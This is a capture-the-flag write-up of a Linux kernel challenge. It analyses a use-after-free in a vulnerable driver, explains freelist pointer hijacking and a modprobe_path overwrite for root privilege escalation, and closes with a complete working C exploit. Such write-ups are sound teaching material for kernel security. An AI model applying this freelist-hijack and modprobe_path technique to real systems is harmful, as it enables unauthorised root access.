Freelist Hijacking¶

Similar to the technique of allocating a fake chunk and overwriting __free_hook in userspace glibc, we can also overwrite the next pointer in the freelist to achieve object allocation at an arbitrary address in kernel space, and modify some useful data in the kernel to achieve privilege escalation (e.g., certain function tables).

Example: RWCTF2022 University Contest - Digging into kernel 1 & 2¶

The two challenges are essentially the same one, because the first challenge had a vulnerability in its startup script that allowed directly obtaining the flag, so the second challenge is actually a fix of the first challenge's script.

Challenge attachments can be downloaded at https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/kernel-mode/RWCTF2022-digging-into-kernel-2.

Challenge Analysis¶

First, let's look at the startup script:

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet kalsr" \
    -cpu kvm64,+smep,+smap \
    -monitor null \
    --nographic

SMEP and SMAP are enabled. The challenge author misspelled kaslr as kalsr, but this does not affect the default enabling of kaslr.

Checking /sys/devices/system/cpu/vulnerabilities/*, we can see that KPTI is enabled:

/home $ cat /sys/devices/system/cpu/vulnerabilities/*
Processor vulnerable
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected

The challenge provides an xkmod.ko file, which should be the vulnerable LKM as usual. Let's load it into IDA for analysis.

When the module is loaded, it creates a new kmem_cache called "lalala" with an object size of 192. Note that the last three parameters are all 0, corresponding to align, flags, and ctor (constructor). Since the SLAB_ACCOUNT flag is not set, this kmem_cache will be merged with kmalloc-192 by default.

int __cdecl xkmod_init()
{
  kmem_cache *v0; // rax

  printk(&unk_1E4);
  misc_register(&xkmod_device);
  v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
  buf = 0LL;
  s = v0;
  return 0;
}

It defines a standard menu heap, providing allocation, editing, and reading of objects. Here buf is a global pointer. We can notice that none of the operations in ioctl are locked.

void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3)
{
  __int64 v3; // [rsp+0h] [rbp-20h] BYREF
  unsigned int v4; // [rsp+8h] [rbp-18h]
  unsigned int v5; // [rsp+Ch] [rbp-14h]
  unsigned __int64 v6; // [rsp+10h] [rbp-10h]

  v6 = __readgsqword(0x28u);
  if ( a3 )
  {
    copy_from_user(&v3, a3, 16LL);
    if ( a2 == 107374182 )
    {
      if ( buf && v5 <= 0x50 && v4 <= 0x70 )
      {
        copy_from_user((char *)buf + (int)v4, v3, (int)v5);
        return;
      }
    }
    else
    {
      if ( a2 != 125269879 )
      {
        if ( a2 == 17895697 )
          buf = (void *)kmem_cache_alloc(s, 3264LL);
        return;
      }
      if ( buf && v5 <= 0x50 && v4 <= 0x70 )
      {
        copy_to_user(v3, (char *)buf + (int)v4);
        return;
      }
    }
    xkmod_ioctl_cold();
  }
}

We should pass in the following structure:

struct Data
{
    size_t *ptr;
    unsigned int offset;
    unsigned int length;
}data;

The main vulnerability is that when the device file is closed, buf is freed but the buf pointer is not set to NULL. As long as we open multiple device files simultaneously, we can achieve UAF.

int __fastcall xkmod_release(inode *inode, file *file)
{
  return kmem_cache_free(s, buf);
}

Basically a replica of CISCN-2017's babydrive...

Exploitation¶

We have a fully-featured "heap menu" and an almost infinitely reusable UAF. We can already do anything we want in kernel space (we don't even need to exploit the unlocked ioctl vulnerability), so the solutions are diverse.

Step.I - Achieving Arbitrary Kernel Address Read/Write¶

Let's first see what information we can obtain using the UAF. After multiple attempts, the author found that when we read data from the freed buf, the first 8 bytes are always a pointer located on the kernel heap, but usually with different in-page offsets, which tells us:

The offset of this kmem_cache is 0
This kernel does not have HARDENED_FREELIST protection enabled
This kernel has RANDOM_FREELIST protection enabled

Freelist randomization is not a runtime protection, but rather shuffles the object pointers within a page randomly when allocating pages for slub. However, subsequent allocations and frees still follow the Last-In-First-Out principle. Therefore, we can first obtain a UAF on an object, modify its next pointer to the address we want to allocate, and then perform two consecutive allocations to successfully obtain an object at the target address, achieving arbitrary address read/write.

However, there is a small issue with this approach. When we allocate at the target address, the first 8 bytes of the target address will be written into the freelist, which is usually not a valid address, causing a kernel panic. Therefore, we should try to select an area with 8 bytes of zeros before the target address, so that the freelist gets a NULL pointer, prompting the kmem_cache to request a new slub from the buddy system, thus avoiding a crash.

Careful readers may have noticed that the original slub still has a certain number of free objects, and discarding them directly would cause a memory leak. However, first, this small amount of leaked memory will not cause negative effects, and second, this is not something we as attackers should worry about (laughs)

Step.II - Leaking the Kernel Base Address¶

Next, let's consider how to leak the kernel base address. Although the kmem_cache created by the challenge will be merged with kmalloc-192 by default, to restore the challenge author's original intent, we will treat it as an independent kmem_cache for the exploit.

At the kernel "heap base address" (page_offset_base) + 0x9d000, the address of the secondary_startup_64 function is stored. We can obtain a heap address from the free object's next pointer, and from that guess the heap base address. Then we allocate an object at heap base address + 0x9d000 to leak the kernel base address. There happens to be a NULL region before this address that is convenient for our allocation.

If we don't guess correctly, the author believes we can simply retry. However, note that we cannot exit directly; we should keep the file descriptors of the original process open, otherwise it will trigger slub's double free detection when exiting the process. In the author's testing, the heap base address can be guessed correctly in most cases.

Step.III - Modifying modprobe_path to Execute Programs as Root¶

Next, let's consider how to complete the exploit through arbitrary address write. A common approach is to overwrite some globally writable function tables in the kernel (such as n_tty_ops) to hijack the kernel execution flow. Here the author chose to overwrite modprobe_path to execute programs as root.

When we try to execute (execve) an invalid file (file magic not found), the kernel goes through the following call chain:

entry_SYSCALL_64()
    sys_execve()
        do_execve()
            do_execveat_common()
                bprm_execve()
                    exec_binprm()
                        search_binary_handler()
                            __request_module() // wrapped as request_module
                                call_modprobe()

call_modprobe() is defined in kernel/kmod.c. We mainly focus on this part of the code (from kernel source 5.14):

static int call_modprobe(char *module_name, int wait)
{
    //...
    argv[0] = modprobe_path;
    argv[1] = "-q";
    argv[2] = "--";
    argv[3] = module_name;  /* check free_modprobe_argv() */
    argv[4] = NULL;

    info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
                     NULL, free_modprobe_argv, NULL);
    if (!info)
        goto free_module_name;

    return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
    //...

Here it calls the function call_usermodehelper_exec(), which executes modprobe_path as an executable file path with root privileges. The default value stored at this address is /sbin/modprobe.

It's easy to see that if we can hijack modprobe_path and rewrite it to the path of a malicious script we specify, then when we execute an invalid file, the kernel will execute our malicious script with root privileges.

EXPLOIT¶

The final exp is as follows:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>

#define MODPROBE_PATH 0xffffffff82444700

struct Data
{
    size_t *ptr;
    unsigned int offset;
    unsigned int length;
};

#define ROOT_SCRIPT_PATH  "/home/getshell"
char root_cmd[] = "#!/bin/sh\nchmod 777 /flag";

/* bind the process to specific core */
void bindCore(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

void errExit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    exit(EXIT_FAILURE);
}

void allocBuf(int dev_fd, struct Data *data)
{
    ioctl(dev_fd, 0x1111111, data);
}

void editBuf(int dev_fd, struct Data *data)
{
    ioctl(dev_fd, 0x6666666, data);
}

void readBuf(int dev_fd, struct Data *data)
{
    ioctl(dev_fd, 0x7777777, data);
}

int main(int argc, char **argv, char **envp)
{
    int dev_fd[5], root_script_fd, flag_fd;
    size_t kernel_heap_leak, kernel_text_leak;
    size_t kernel_base, kernel_offset, page_offset_base;
    char flag[0x100];
    struct Data data;

    /* fundamental works */
    bindCore(0);

    for (int i = 0; i < 5; i++) {
        dev_fd[i] = open("/dev/xkmod", O_RDONLY);
    }

    /* create fake modprobe_path file */
    root_script_fd = open(ROOT_SCRIPT_PATH, O_RDWR | O_CREAT);
    write(root_script_fd, root_cmd, sizeof(root_cmd));
    close(root_script_fd);
    system("chmod +x " ROOT_SCRIPT_PATH);

    /* construct UAF */
    data.ptr = malloc(0x1000);
    data.offset = 0;
    data.length = 0x50;
    memset(data.ptr, 0, 0x1000);

    allocBuf(dev_fd[0], &data);
    editBuf(dev_fd[0], &data);
    close(dev_fd[0]);

    /* leak kernel heap addr and guess the page_offset_base */
    readBuf(dev_fd[1], &data);
    kernel_heap_leak = data.ptr[0];
    page_offset_base = kernel_heap_leak & 0xfffffffff0000000;

    printf("[+] kernel heap leak: 0x%lx\n", kernel_heap_leak);
    printf("[!] GUESSING page_offset_base: 0x%lx\n", page_offset_base);

    /* try to alloc fake chunk at (page_offset_base + 0x9d000 - 0x10) */
    puts("[*] leaking kernel base...");

    data.ptr[0] = page_offset_base + 0x9d000 - 0x10;
    data.offset = 0;
    data.length = 8;

    editBuf(dev_fd[1], &data);
    allocBuf(dev_fd[1], &data);
    allocBuf(dev_fd[1], &data);

    data.length = 0x40;
    readBuf(dev_fd[1], &data);
    if ((data.ptr[2] & 0xfff) != 0x30) {
        printf("[!] invalid data leak: 0x%lx\n", data.ptr[2]);
        errExit("\033[31m\033[1m[x] FAILED TO HIT page_offset_base! TRY AGAIN!");
    }

    kernel_base = data.ptr[2] - 0x30;
    kernel_offset = kernel_base - 0xffffffff81000000;
    printf("\033[32m\033[1m[+] kernel base:\033[0m 0x%lx\n", kernel_base);
    printf("\033[32m\033[1m[+] kernel offset:\033[0m 0x%lx\n", kernel_offset);

    /* hijack the modprobe_path, we'll let it requesting new slub page for it */
    puts("[*] hijacking modprobe_path...");

    allocBuf(dev_fd[1], &data);
    close(dev_fd[1]);

    data.ptr[0] = kernel_offset + MODPROBE_PATH - 0x10;
    data.offset = 0;
    data.length = 0x8;

    editBuf(dev_fd[2], &data);
    allocBuf(dev_fd[2], &data);
    allocBuf(dev_fd[2], &data);

    strcpy((char *) &data.ptr[2], ROOT_SCRIPT_PATH);
    data.length = 0x30;
    editBuf(dev_fd[2], &data);

    /* trigger the fake modprobe_path */
    puts("[*] trigerring fake modprobe_path...");

    system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
    system("chmod +x /home/fake");
    system("/home/fake");

    /* read flag */
    memset(flag, 0, sizeof(flag));

    flag_fd = open("/flag", O_RDWR);
    if (flag_fd < 0) {
        errExit("failed to chmod flag!");
    }

    read(flag_fd, flag, sizeof(flag));
    printf("\033[32m\033[1m[+] Got flag: \033[0m%s\n", flag);

    return 0;
}